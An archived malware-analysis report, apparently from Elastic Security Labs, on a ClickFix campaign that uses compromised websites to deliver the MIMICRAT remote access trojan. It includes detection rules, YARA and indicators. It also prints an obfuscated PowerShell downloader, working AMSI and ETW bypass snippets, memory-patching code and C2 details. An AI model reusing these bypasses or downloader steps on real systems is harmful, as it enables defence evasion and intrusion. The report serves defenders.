{
	"id": "28a9c18e-e3aa-4915-a4ff-5765de24feac",
	"created_at": "2026-04-06T00:14:15.279554Z",
	"updated_at": "2026-04-10T13:11:38.233454Z",
	"deleted_at": null,
	"sha1_hash": "7929dba1af8e986834fdc8b57fee101f3f8a9983",
	"title": "MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2293323,
	"plain_text": "MIMICRAT: ClickFix Campaign Delivers Custom RAT via\r\nCompromised Legitimate Websites\r\nBy Salim Bitam\r\nPublished: 2026-02-20 · Archived: 2026-04-05 18:31:09 UTC\r\nIntroduction\r\nDuring a recent investigation, Elastic Security Labs identified an active ClickFix campaign compromising multiple\r\nlegitimate websites to deliver a multi-stage malware chain. Unlike simpler ClickFix deployments that terminate at\r\ncommodity infostealers, this campaign ends with a capable custom remote access trojan (RAT) we have called\r\nMIMICRAT: a native C implant with malleable C2 profiles, token impersonation, SOCKS5 tunneling, and a 22-\r\ncommand dispatch table.\r\nThe campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries\r\nand geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass\r\nbefore dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using\r\nHTTP profiles that resemble legitimate web analytics traffic.\r\nKey takeaways\r\nMultiple legitimate websites were compromised to deliver a five-stage attack chain.\r\nThe Lua loader executes embedded shellcode.\r\nMIMICRAT is a bespoke native C++ RAT with malleable C2 profiles, Windows token theft, and SOCKS5\r\nproxy.\r\nDiscovery\r\nElastic Security Labs first identified this campaign in early February 2026 through endpoint telemetry flagging\r\nsuspicious PowerShell execution with obfuscated command-line arguments.\r\nTelemetry: Obfuscated powershell execution\r\nGiven the novelty of the final payload, we publicly disclosed initial indicators via social media on February 11, 2026 to\r\nensure the broader security community could begin hunting for and defending against this threat while our full analysis\r\nwas underway. The campaign remains active as of this publication.\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 1 of 14\n\nResearchers at Huntress have documented related ClickFix campaigns using similar infrastructure and techniques,\r\nindicating the breadth of this threat actor's operations across multiple parallel campaigns.\r\nCampaign Delivery\r\nThe campaign's delivery relies entirely on compromising legitimate, trusted websites rather than attacker-owned\r\ninfrastructure. The entry point for victims is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation\r\nservice. The threat actor compromised this site and injected a malicious JavaScript snippet that dynamically loads an\r\nexternal script hosted at https://www.investonline[.]in/js/jq.php , a second compromised site, a legitimate Indian\r\nmutual fund investment platform (Abchlor Investments Pvt. Ltd.). The external script is named to impersonate the\r\njQuery library, blending into the page's existing resource load.\r\nIt is this remotely loaded script ( jq.php ) that delivers the ClickFix lure: a fake Cloudflare verification page instructing\r\nthe victim to manually paste and execute a command to \"fix\" a problem. The lure copies a malicious PowerShell\r\ncommand directly to the victim's clipboard and prompts them to open a Run dialog ( Win+R ) or PowerShell prompt and\r\npaste it. This technique bypasses browser-based download protections entirely, as no file is downloaded.\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 2 of 14\n\nbincheck.io page source showing the injected script loading jq.php from investonline.in\r\nThis multidimensional compromise relies on a victim-facing website loading a malicious script from a second\r\ncompromised website, distributes detection risk and increases the perceived legitimacy of the lure to both users and\r\nautomated security tools. The campaign supports 17 languages, with the lure content dynamically localized based on the\r\nvictim's browser language settings to broaden its effective reach. Identified victims span multiple geographies, including\r\na USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad\r\nopportunistic targeting.\r\nThe following is the list of supported languages by the ClickFix:\r\nEnglish\r\nChinese\r\nRussian\r\nSpanish\r\nFrench\r\nGerman\r\nPortuguese\r\nJapanese\r\nKorean\r\nItalian\r\nTurkish\r\nPolish\r\nDutch\r\nVietnamese\r\nArabic\r\nHindi\r\nIndonesian\r\nCode analysis\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 3 of 14\n\nOnce the victim executes the clipboard command, the campaign unfolds across five distinct stages: an obfuscated\r\nPowerShell downloader contacts the C2 to retrieve a second-stage script that patches Windows event logging(ETW) and\r\nantivirus scanning(AMSI) before dropping a Lua-based loader; the loader decrypts and executes shellcode entirely in\r\nmemory; and the shellcode ultimately delivers MIMICRAT, a capable RAT designed for persistent access and lateral\r\nmovement.\r\nStage 1 Powershell one liner command\r\nThe clipboard-delivered command is a compact and obfuscated PowerShell one-liner:\r\npowershell.exe -WInDo Min $RdLU='aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf';$OnRa=($RdLU.Substring(17,12));$jOFn=.($RdLU[(8\r\nThe command uses string slicing and arithmetic index operations on a single seed string\r\n( aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf ) to reconstruct both the target domain and the invocation mechanism at\r\nruntime, avoiding any plaintext representation of the C2 domain or PowerShell cmdlet names in the initial payload. The\r\nwindow is minimized ( -WInDo Min ). The extracted domain is xMRi.neTwOrk , which resolves to 45.13.212.250 , and\r\ndownloads a second-stage PowerShell script.\r\nInfrastructure pivoting on 45.13.212.250 via VirusTotal relations revealed a second domain, WexMrI.CC , resolving to\r\nthe same IP. Both domains share the same mixed-case formatting obfuscation pattern.\r\nPowerShell deobfuscation in a debug session $HDjo resolves to WexMrI.CC\r\nStage 2 Obfuscated Powershell script\r\nThe downloaded second-stage PowerShell script is significantly more elaborated. All strings are constructed at runtime\r\nby resolving arithmetic expressions to ASCII characters:\r\n$smaau = (-join[char[]](((7454404997-7439813680)/175799),(91873122/759282),...))\r\n# Resolves to: \"System.Diagnostics.Eventing.EventProvider\"\r\nThis technique renders the script opaque to static analysis and signature-based detection while remaining fully\r\nfunctional at runtime. A dummy class declaration is included as a decoy and\r\nthe script executes four sequential operations:\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 4 of 14\n\nETW Bypass\r\nThe script accesses the internal m_enabled field of the System.Diagnostics.Eventing.EventProvider class via\r\nreflection and patches its value to 0 , effectively disabling Event Tracing for Windows and blinding PowerShell script\r\nblock logging.\r\n[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetFie\r\nAMSI Bypass\r\nThe script then uses reflection to access System.Management.Automation.AmsiUtils and sets the amsiInitFailed\r\nfield to $true , causing PowerShell to skip all AMSI content scanning for the remainder of the session.\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetVal\r\nAMSI - Memory Patching\r\nThe script performs runtime method handle patching via Marshal.Copy in an additional but less common defense\r\nevasion step overwriting method pointers in memory to redirect execution away from monitored code paths. This targets\r\nthe function ScanContent under System.Management.Automation.AmsiUtils to an empty generate method.\r\n$ScanContent_func = [Ref].Assembly.GetType(\"System.Management.Automation.AmsiUtils\").GetMethods(\"NonPublic,Static\")\r\n$tttttttttt = [zsZRXVIIMQvZ].GetMethods() | Where-Object Name -eq \"FHVcGSwOEM\"\r\n[System.Runtime.InteropServices.Marshal]::Copy( @([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]$ttttttt\r\n 0,\r\n [long]$ScanContent_func.MethodHandle.Value + [long]8,\r\n 1\r\n)\r\nPayload Delivery\r\nWith event logging and AV scanning disabled, the script decodes a base64-encoded ZIP archive, extracts it to a\r\nrandomly named directory under %ProgramData% / knz_{random} , and executes the contained binary zbuild.exe .\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 5 of 14\n\nTemporary artifacts are cleaned up post-execution.\r\n$extractTo = Join-Path $env:ProgramData (\"knz_{0}\" -f ([IO.Path]::GetRandomFileName()))\r\n[IO.Compression.ZipFile]::ExtractToDirectory($tempZip, $extractTo)\r\nStart-Process (Join-Path $extractTo 'zbuild.exe')\r\nStage 3 Lua loader\r\nThe dropped binary is a custom Lua 5.4.7 loader. It embeds a Lua interpreter statically.\r\nThe binary decrypts an embedded Lua script using a XOR stub at runtime, then executes it. The XOR decryption routine\r\n( fxh::utility::lua_script_xor_decrypt ) iterates over the encrypted buffer XORing each byte against a key.\r\nXOR decryption routine in the Lua loader\r\nThe Lua script implements a custom Base64 decoder with a non-standard alphabet to decode an embedded shellcode.\r\nThe decoded shellcode is then allocated in executable memory via luaalloc , copied into that memory with luacpy ,\r\nand finally executed via luaexe , achieving fully in-memory, fileless shellcode execution.\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 6 of 14\n\nDecrypted Lua script\r\nStage 4 shellcode\r\nShellcode matched Meterpreter-related signatures, suggesting the shellcode stage is a loader consistent with the\r\nMeterpreter code-family to reflectively load MIMICRAT into memory.\r\nStage 5 MIMICRAT\r\nThe final payload with compilation metadata set to January 29 2026 is a native MSVC x64 PEcompiled with Microsoft\r\nVisual Studio linker version 14.44. It does not match any known open-source C2 framework exactly, implementing its\r\nown malleable HTTP C2 profiles with ASCII-character-based command dispatch and a custom architecture.\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 7 of 14\n\nVirusTotal detection page\r\nC2 Configuration and communication\r\nMIMICRAT's configuration is stored in the .data section. It contains cryptographic keys, connection parameters, and\r\ntwo complete HTTP communication profiles. All header strings and URIs are hex-encoded ASCII, and decoded at\r\nruntime.\r\nThe C2 operates over HTTPS on port 443 with a 10-second callback interval. The C2 server hostname\r\n( d15mawx0xveem1.cloudfront.net ) is RC4 encrypted with the following RC4 key\r\n@z1@@9\u0026Yv6GR6vp#SyeG\u0026ZkY0X74%JXLJEv2Ci8\u0026J80AlVRJk\u00266Cl$Hb)%a8dgqthEa6!jbn70i27d4bLcE33acSoSaSsq6KpRaA7xDypo(5 .\r\nThe implant uses HTTPS for communication with a layered encryption scheme: an embedded RSA-1024 public key\r\nhandles asymmetric session key exchange.\r\nImporting rsa public key\r\nWhile AES is used for symmetric encryption of C2 traffic it uses a hardcoded IV abcdefghijklmnop and a runtime\r\ncalculated key which derived from a SHA-256 hash value of a randomly generated alpha-numeric value example\r\n9ZQs0p0gfpOj3Y02.\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 8 of 14\n\nAES encryption\r\nThe following are the profile used by the sample for POST and GET requests:\r\nHTTP GET Profile: Check-in and Tasking\r\nComponent Value\r\nURI /intake/organizations/events?channel=app\r\nUser-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.9.19041; ...) Edge/18.19045\r\nReferer [https://www.google.com/?q=dj1](https://www.google.com/?q=dj1)\r\nAccept-Language zh-CN,zh;q=0.9\r\nCookies AFUAK , BLA , HFK\r\nHTTP POST Profile: Data Exfiltration\r\nComponent Value\r\nURI /discover/pcversion/metrics?clientver=ds\r\nReferer [https://gsov.google.com/](https://gsov.google.com/)\r\nCookies ARCHUID , BRCHD , ZRCHUSR\r\nCommand Dispatch\r\nMIMICRAT implements a total of 22 distinct commands to provide post-exploitation capabilities like process and file\r\nsystem control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. The\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 9 of 14\n\nbeacon interval and jitter are operator-configurable at runtime via dedicated commands. The following is a summarized\r\ntable of all the implemented commands:\r\nCmd\r\nID\r\nFunction Description\r\n3 Exit Terminates the implant process\r\n4 Set beacon interval Configures sleep duration and jitter\r\n5 Change directory Changes the current working directory\r\n10 Write file Writes a C2-supplied payload to disk (overwrite)\r\n11 Read file Reads a file from disk and exfiltrates contents to C2\r\n12 Spawn process\r\nLaunches a process using a stolen token if available, falling back to standard\r\nexecution\r\n28\r\nRevert\r\nimpersonation\r\nReverts token impersonation and clears token state\r\n31 Steal token Duplicates the security token of a target process by PID\r\n32 List processes Enumerates running processes with PID, PPID, user, domain, and architecture\r\n33 Kill process Terminates a process by PID\r\n39\r\nGet current\r\ndirectory\r\nReturns the current working directory to C2\r\n53 List files Lists files and directories with timestamps and sizes\r\n54 Create directory Creates a directory on disk\r\n55 List drives Enumerates logical drives\r\n56 Delete file/directory Deletes a file or removes a directory\r\n67 Append to file Appends C2-supplied data to an existing file\r\n73 Copy file Copies a file from source to destination\r\n74 Move/rename file Moves or renames a file\r\n78 Interactive shell Opens a persistent interactive CMD shell over a pipe\r\n100 Inject shellcode Reflective shellcode injection\r\n101 SOCKS Configures SOCKS proxy channel or stop it\r\n102 SOCKS proxy Shares handler with command 101; Most likely a placeholder command\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 10 of 14\n\nInfrastructure\r\nThe campaign's network infrastructure clusters into two primary groups:\r\nCluster A — Initial Payload Delivery ( 45.13.212.251 / 45.13.212.250 )\r\nMultiple domains point to this IP range, including xMRi.neTwOrk and WexMrI.CC . Domain naming uses mixed-case\r\nobfuscation. This infrastructure serves the second-stage PowerShell script and the embedded payload ZIP.\r\nVirusTotal relations for 45.13.212.251 showing multiple campaign domains resolving to this IP\r\nCluster B Post-Exploitation C2 ( 23.227.202.114 )\r\nAssociated with www.ndibstersoft[.]com and observed in beacon communications from the dropped file. This\r\nrepresents the operator's post-exploitation C2 channel.\r\nCloudFront C2 Relay\r\nd15mawx0xveem1.cloudfront[.]net is confirmed as part of MIMICRAT's C2 infrastructure. VT relations for the\r\nrgen.zip sample show it contacting this CloudFront domain using the same /intake/organizations/events?\r\nchannel=app URI pattern identified in MIMICRAT's GET profile, confirming it acts as a C2 relay fronting for the\r\nbackend server.\r\nDelivery Infrastructure\r\nTwo compromised legitimate websites form the delivery chain:\r\nbincheck.io — victim-facing entry point; compromised to load the external malicious script\r\ninvestonline.in — hosts the ClickFix JavaScript payload ( /js/jq.php ) disguised as jQuery; this script\r\nrenders the lure and delivers the clipboard PowerShell\r\nMalware and MITRE ATT\u0026CK**\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nTactics\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 11 of 14\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing\r\nan action.\r\nInitial Access\r\nExecution\r\nDefense Evasion\r\nPersistence\r\nPrivilege Escalation\r\nDiscovery\r\nExfiltration\r\nCommand and Control\r\nTechniques\r\nTechniques represent how an adversary achieves a tactical goal by performing an action.\r\nPhishing: Spearphishing via Service (ClickFix clipboard)\r\nUser Execution: Malicious Link\r\nCommand and Scripting Interpreter: PowerShell\r\nObfuscated Files or Information: Command Obfuscation\r\nImpair Defenses: Disable or Modify Tools (AMSI bypass)\r\nImpair Defenses: Disable Windows Event Logging (ETW patch)\r\nReflective Code Loading / In-Memory Execution\r\nScheduled Task/Job\r\nAccess Token Manipulation: Token Impersonation/Theft\r\nProcess Injection\r\nProcess Discovery\r\nFile and Directory Discovery\r\nExfiltration Over C2 Channel\r\nApplication Layer Protocol: Web Protocols (HTTPS)\r\nProxy\r\nMitigations\r\nDetection\r\nThe following detection rules and behavior prevention events were observed throughout the analysis of this intrusion\r\nset:\r\nExecution via Obfuscated PowerShell Script\r\nDNS Query to Suspicious Top Level Domain\r\nSuspicious Command Shell Execution via Windows Run\r\nToken theft and impersonation\r\nPotential Privilege Escalation via Token Impersonation\r\nShellcode Execution from Low Reputation Module\r\nYARA\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 12 of 14\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the MimicRat:\r\nrule Windows_Trojan_MimicRat {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2026-02-13\"\r\n last_modified = \"2026-02-13\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"MimicRat\"\r\n threat_name = \"Windows.Trojan.MimicRat\"\r\n reference_sample = \"a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b\"\r\n scan_type = \"File, Memory\"\r\n severity = 100\r\n strings:\r\n $b_0 = { 41 8B 56 18 49 8B 4E 10 41 89 46 08 }\r\n $b_1 = { 41 FF C0 48 FF C1 48 83 C2 4C 49 3B CA }\r\n condition:\r\n all of them\r\n}\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable Type Name Reference\r\nbcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1\r\nSHA-256\r\nStage 1\r\nPowerShell\r\npayload\r\n5e0a30d8d91d5fd46da73f3e6555936233d870ac789ca7dd64c9d3cc74719f51\r\nSHA-256\r\nLua loader\r\na508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b\r\nSHA-256MIMICRAT\r\nbeacon\r\n055336daf2ac9d5bbc329fd52bb539085d00e2302fa75a0c7e9d52f540b28beb\r\nSHA-256Related beacon\r\nsample\r\n45.13.212.251 IP\r\nPayload delivery\r\ninfrastructure\r\n45.13.212.250 IP\r\nPayload delivery\r\ninfrastructure\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 13 of 14\n\nObservable Type Name Reference\r\n23.227.202.114 IP\r\nPost-exploitation C2\r\nxmri.network Domain\r\nStage 1 C2 /\r\npayload delivery\r\nwexmri.cc Domain\r\nStage 1 C2\r\nalternate\r\nwww.ndibstersoft[.]com Domain\r\nPost-exploitation C2\r\nd15mawx0xveem1.cloudfront[.]net Domain\r\nPost-exploitation C2\r\nwww.investonline.in/js/jq.php URL\r\nMalicious JS\r\npayload host\r\n(compromised)\r\nbackupdailyawss.s3.us-east-1.amazonaws[.]com/rgen.zip URL Payload delivery\r\nSource: https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks"
	],
	"report_names": [
		"mimicrat-custom-rat-mimics-c2-frameworks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7929dba1af8e986834fdc8b57fee101f3f8a9983.pdf",
		"text": "https://archive.orkl.eu/7929dba1af8e986834fdc8b57fee101f3f8a9983.txt",
		"img": "https://archive.orkl.eu/7929dba1af8e986834fdc8b57fee101f3f8a9983.jpg"
	}
}